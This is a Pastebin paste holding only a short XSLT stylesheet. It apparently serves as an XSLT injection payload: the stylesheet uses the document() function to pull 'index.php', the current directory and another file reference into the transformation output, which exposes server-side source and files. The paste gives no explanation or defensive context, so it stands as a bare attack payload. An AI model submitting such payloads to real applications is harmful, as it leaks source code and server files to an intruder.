Advertisement
Guest User

Untitled

a guest
Mar 25th, 2019
85
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?xml version='1.0'?>
  2. <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  3. <xsl:template match="/">
  4. <xsl:value-of select="document(file)"/>
  5. <xsl:value-of select="document('index.php')"/>
  6. <xsl:value-of select="document('.')"/>
  7. </xsl:template>
  8. </xsl:stylesheet>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement